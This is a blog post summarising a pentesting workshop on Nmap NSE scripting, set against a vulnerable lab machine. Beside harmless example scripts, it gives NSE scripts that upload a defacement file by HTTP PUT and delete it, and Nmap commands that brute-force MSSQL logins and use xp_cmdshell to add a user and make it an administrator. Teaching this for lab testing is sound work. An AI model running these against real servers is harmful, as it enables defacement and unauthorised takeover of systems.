Sunday, February 2, 2014

NULL-HUMLA-NMAP-NSE-NetworkPentesting

This is about the NULL Humla happened about NMAP NSE Scripting - by Sudhir Babu & Rupam Bhattacharya at Bangalore Center for Internet and Society.

Agenda:

1. Getting familiar with usage of nmap scripting
2. Go inside and see the script source and understand fundamental structure 
3. Write your own script and execute the same with nmap against target machine
4. Getting a shell on target using default scripts on a vulnerable system.

Pre-requisite : Two Systems 
                      1. Any system running with latest version of nmap
                      2. Target vulnerable system  (Windows XP with SQL Server was provided)

Getting familiar with NMAP
http://www.nmap.org 

Location of script files on Linux system




How to run scripts 

#nmap -p80 -PN -n 192.168.2.128 --script=http-date

The following description is available in the description part of script

"This script will scan port 80 and if its open it will check the date. Gets the date from HTTP-like services. Also prints how much the date differs from local time. Local time is the time the HTTP request was sent, so the difference includes at least the duration of one RTT."

Script Structure 

The following is a script to retrieve the day and time from the day-time server 

local comm = require "comm"
local shortport = require "shortport"

description = [[
Retrieves the day and time from the Daytime service.
]]

---
-- @output
-- PORT   STATE SERVICE
-- 13/tcp open  daytime
-- |_daytime: Wed Mar 31 14:48:58 MDT 2010

author = "Diman Todorov"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"discovery", "safe"}


portrule = shortport.port_or_service(13, "daytime", {"tcp", "udp"})

action = function(host, port)
        local status, result = comm.exchange(host, port, "dummy", {lines=1, proto=port.protocol})

        if status then
                return result
        end
end

Elaborated details are already available here -> http://nmap.org/book/nse-script-format.html

Following script will get list of http methods enabled on a web server

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

description = [[
Retrieves the methods enabled on a HTTP Server.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http
action = function(host, port)
response = http.generic_request(host,port,"OPTIONS","/")
return response
end

In this the description, author and licence sections are optional in case of personal use.

This will open connection to the port of web server and send OPTIONS and get the response and return the response to the NMAP engine. NMAP engine will display the result as shown below. We can see NMAP showing the script name and below the output. It allows GET HEAD POST and OPTIONS



Another example against a web server allows other dangerous OPTIONS like DELETE, PUT,MOVE, etc.



How to put a file to the web server using NSE Script.

Method one using PUT. 

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

description = [[
Retrieves the methods enabled on a HTTP Server.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http
action = function(host, port)
response = http.put(host,port,"/deface.txt",nil,"defacingweb")
return response
end


TO DELETE an uploaded file
local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

description = [[
Retrieves the methods enabled on a HTTP Server.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http
action = function(host, port)
response = http.generic_request(host,port,"DELETE","/deface.txt",nil)
return response
end

SOCKET

Create a file using NSE Socket

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

categories = {"default"}

portrule = shortport.http

local socket = nmap.new_socket()

action = function(host,port)
        socket:connect(host,port)
        socket:send("PUT /deface.txt HTTP/1.1 \r\nHost: 192.168.0.5\r\nContent-length: 6\r\n\r\ndeface")
        response=socket:receive()
        return response
end


Other default NSE script example

SQL username/password brute-forcing
 #nmap -p 1433 --script ms-sql-brute --script-args userdb=username.txt ,passdb=password.txt 192.168.0.5

SQL CMD SHELL add a user
 nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net user admin1 admin1-password /add" 192.168.0.5

Add the user to Administrators group(net localgroup administrators <username> /add)

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net localgroup administrators admin1 /add" 192.168.0.5

Run other commands example "ipconfig"
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.0.5



Thanks to NULL++ Sudhir Babu ++ Rupam Bhattacharya & Riyaz Walikar ++ Akash Mahajan


2 comments:

  1. A very good tutorial for basics of nmap NSE scripting....and of-course it was really a nice and interactive session. :)

    ReplyDelete
  2. Appreciate this.. As this training is very selecting.. Posting these does help people who are interested but couldnt make it to training

    ReplyDelete